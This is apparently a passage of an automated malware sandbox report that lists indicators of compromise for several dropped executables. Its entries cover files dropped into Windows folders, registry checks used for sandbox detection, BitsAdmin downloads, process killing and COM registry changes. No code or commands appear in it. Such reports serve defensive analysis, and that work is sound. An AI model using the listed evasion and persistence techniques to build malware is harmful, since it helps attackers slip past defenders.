hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\libvlccore.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\librss_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\httprequests.luac hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdirectory_demux_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\liblogger_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_copy_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe Setup.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvc1_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libsubsdelay_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\connection.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\common.js hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll hJnmKJvqSgAJfTJT6M9Cw6Ri.exe -
Drops file in Windows directory 34 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI1351.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI553A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI55D7.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\MSI13AF.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI547D.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI45B2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI51BB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI12B3.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSI5B96.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Installer\f780736.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\MSIAC0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1234.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3EB8.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4544.tmp msiexec.exe File opened for modification C:\Windows\Installer\f780736.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI408E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4E4F.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File opened for modification C:\Windows\Installer\MSI5278.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI53F0.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\Installer\f780739.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI1178.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1274.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI41B8.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI433F.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 12 IoCs
pid pid_target Process procid_target 3180 1492 WerFault.exe 76 4620 3920 WerFault.exe 92 4232 392 WerFault.exe 113 908 4864 WerFault.exe 123 4916 4864 WerFault.exe 123 4240 4864 WerFault.exe 123 4960 4864 WerFault.exe 123 4492 1648 WerFault.exe 125 4100 4864 WerFault.exe 123 4292 4864 WerFault.exe 123 2608 4864 WerFault.exe 123 4876 6080 WerFault.exe 187 -
Checks SCSI registry key(s) 3 TTPs 21 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iccfjss Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sonia_2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hsCdANIUKB4wzcSDG7GdlU2e.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wgcfjss Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iccfjss Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iccfjss Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iccfjss Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wgcfjss Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sonia_2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI sonia_2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI powershell.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hsCdANIUKB4wzcSDG7GdlU2e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wgcfjss Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iccfjss Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hsCdANIUKB4wzcSDG7GdlU2e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI iccfjss Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI powershell.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wgcfjss Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wgcfjss Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wgcfjss -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString GameBox64bit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 c7ITdNhhcio8ABAfjezodNVE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 GameBox64bit.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 i5bS_Ih72f4r9YsRDRsMHIek.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString i5bS_Ih72f4r9YsRDRsMHIek.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString c7ITdNhhcio8ABAfjezodNVE.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 5056 timeout.exe 3716 timeout.exe 696 timeout.exe 4960 timeout.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 6136 bitsadmin.exe -
Kills process with taskkill 7 IoCs
pid Process 6120 taskkill.exe 5200 taskkill.exe 6864 taskkill.exe 4180 taskkill.exe 4916 taskkill.exe 5244 taskkill.exe 5476 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time" Z0mpIdw250ioIlFq9G4jxj2t.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" 5674d7511aa1fce0a68969dc57375b63.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" Z0mpIdw250ioIlFq9G4jxj2t.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-492 = "India Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" 5674d7511aa1fce0a68969dc57375b63.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" 5674d7511aa1fce0a68969dc57375b63.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" 5674d7511aa1fce0a68969dc57375b63.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" 5674d7511aa1fce0a68969dc57375b63.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" 5674d7511aa1fce0a68969dc57375b63.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2412 = "Marquesas Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-932 = "Coordinated Universal Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" Z0mpIdw250ioIlFq9G4jxj2t.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2411 = "Marquesas Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" 5674d7511aa1fce0a68969dc57375b63.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates Z0mpIdw250ioIlFq9G4jxj2t.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-562 = "SE Asia Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" 5674d7511aa1fce0a68969dc57375b63.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" 5674d7511aa1fce0a68969dc57375b63.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" 5674d7511aa1fce0a68969dc57375b63.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" Z0mpIdw250ioIlFq9G4jxj2t.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" 5674d7511aa1fce0a68969dc57375b63.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2342 = "Haiti Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs Z0mpIdw250ioIlFq9G4jxj2t.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" Z0mpIdw250ioIlFq9G4jxj2t.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" Z0mpIdw250ioIlFq9G4jxj2t.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" Z0mpIdw250ioIlFq9G4jxj2t.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" Z0mpIdw250ioIlFq9G4jxj2t.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs 5674d7511aa1fce0a68969dc57375b63.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2771 = "Omsk Daylight Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" Z0mpIdw250ioIlFq9G4jxj2t.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" Z0mpIdw250ioIlFq9G4jxj2t.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" Z0mpIdw250ioIlFq9G4jxj2t.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1972 = "Belarus Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" 5674d7511aa1fce0a68969dc57375b63.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" Z0mpIdw250ioIlFq9G4jxj2t.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" Z0mpIdw250ioIlFq9G4jxj2t.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" 5674d7511aa1fce0a68969dc57375b63.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" Z0mpIdw250ioIlFq9G4jxj2t.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" Z0mpIdw250ioIlFq9G4jxj2t.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-432 = "Iran Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" Z0mpIdw250ioIlFq9G4jxj2t.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" Z0mpIdw250ioIlFq9G4jxj2t.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-272 = "Greenwich Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root Z0mpIdw250ioIlFq9G4jxj2t.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" Z0mpIdw250ioIlFq9G4jxj2t.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" 5674d7511aa1fce0a68969dc57375b63.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 5674d7511aa1fce0a68969dc57375b63.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" 5674d7511aa1fce0a68969dc57375b63.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" 5674d7511aa1fce0a68969dc57375b63.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" Z0mpIdw250ioIlFq9G4jxj2t.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGLockdown\Reported MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D56E1AC5-92D0-4b2a-A8B2-D3E164F540DD}\LocalServer32\ = "C:\\Users\\Admin\\Documents\\dhu7EuXl9V9UCb1xTP4C8z2_.exe" dhu7EuXl9V9UCb1xTP4C8z2_.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{74WP1CM3-506M-V62R-WR42-7MQP227Y2YLP} rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature msiexec.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 1d24df8b702cd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local 